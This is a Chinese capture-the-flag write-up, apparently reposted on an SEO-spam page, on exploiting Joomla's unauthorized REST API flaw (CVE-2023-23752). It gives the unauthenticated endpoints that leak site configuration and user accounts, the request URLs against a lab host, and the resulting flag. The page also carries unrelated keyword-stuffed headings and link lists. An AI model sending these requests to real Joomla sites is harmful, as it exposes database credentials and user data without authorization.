当前位置: 首页 > wzjs >正文

做网站交接需要哪些权限东莞网络优化公司

做网站交接需要哪些权限,东莞网络优化公司,企业号码查询系统,学设计用什么笔记本电脑好首先奉上大佬的wp表示尊敬:(很详细)[ 漏洞复现篇 ] Joomla未授权访问Rest API漏洞(CVE-2023-23752)_joomla未授权访问漏洞(cve-2023-23752)-CSDN博客 知识点 Joomla版本为4.0.0 到 4.2.7 存在未授权访问漏洞 Joomla是一套全球知名的内容管理…

首先奉上大佬的wp表示尊敬:(很详细)[ 漏洞复现篇 ] Joomla未授权访问Rest API漏洞(CVE-2023-23752)_joomla未授权访问漏洞(cve-2023-23752)-CSDN博客

知识点

  • Joomla版本为4.0.0 到 4.2.7 存在未授权访问漏洞
    • Joomla是一套全球知名的内容管理系统(CMS),其使用PHP语言加上MySQL数据库所开发,可以在Linux、Windows、MacOSX等各种不同的平台上运行
  • 未授权api路径
    • 获取网站的配置文件信息
      • /api/index.php/v1/config/application?public=true
    • 获取账号密码信息
      • api/index.php/v1/users?public=true
    • 其他api接口
      • 详见开头大佬的wp结尾

  • REST API

    • 规定固定格式的应用程序接口:将用户操作转为http请求的api

    • 详见:一文彻底弄懂REST API - 知乎

解题思路

题目地址:Home

点击连接进入到网页初始页面

可以看到旁边有很多的链接:登录界面,找回密码界面,找回用户名界面

通过测试发现这些界面无法进入,到这里已废,只能求助大佬的wp

发现了未授权的接口链接:

获取网站的配置文件信息:
/api/index.php/v1/config/application?public=true

将该路径添加到网站后面发现成功得到了配置文件的信息:数据库的相关配置信息

http://eci-2ze1t0ekrilu5ao4y7hg.cloudeci1.ichunqiu.com/api/index.php/v1/config/application?public=true

获取网站的账号密码信息:
api/index.php/v1/users?public=true

通过构造访问得到了flag:flag{c68a8080-245b-4892-9053-21dbb6ad0fa0}

http://eci-2ze1t0ekrilu5ao4y7hg.cloudeci1.ichunqiu.com/api/index.php/v1/users?public=true

10

http://www.dtcms.com/wzjs/524500.html

相关文章:

  • 做域名交易网站百度学术论文查重入口
  • ip形象设计都包含什么河北seo关键词排名优化
  • 设计网站大全软件优化网站关键词优化
  • 网站虚拟主机共享网络平台推广运营有哪些平台
  • 怎么样做游戏网站福州网站排名推广
  • wordpress免费商城seo排名资源
  • 主视觉设计网站百度热榜
  • 网站建设宏观环境产品网络推广的方法有哪些
  • 成都微信网站建设多少钱网络营销企业网站优化
  • 北京市保障房建设投资中心网站瘫痪长沙百度seo
  • 网站英文版是怎么做的磁力
  • 网站开发框架 Wordpress推广网站的文案
  • jsp如何做动态网站北京seo案例
  • 昆明的房产网站建设软件定制开发平台
  • 专业做影评的网站百度图片收录提交入口
  • 青浦做网站的公司app推广平台排行榜
  • 林州二建集团建设有限公司网站东莞seo建站咨询
  • 绍兴以往网站招工做公司网站建设方案
  • 邮件网站怎么做2023年新冠疫情最新消息
  • 淘宝做网站推广人电话外贸网站营销推广
  • 服装定制创业计划书长沙电商优化
  • 哪个网站做图找图片游戏搬砖工作室加盟平台
  • 邢台县教育局五库建设网站黑帽seo是什么
  • 做网站用的服务器网络营销策划师
  • 如何高效率的建设网站小程序怎么引流推广
  • 专注合肥网站建设站长数据
  • 京东商城网上购物登录深圳百度seo培训
  • 莆田网站建设开发深圳龙岗区优化防控措施
  • 视频聊天网站建设舆情监控系统
  • 电子科技 深圳 网站建设seo关键字优化软件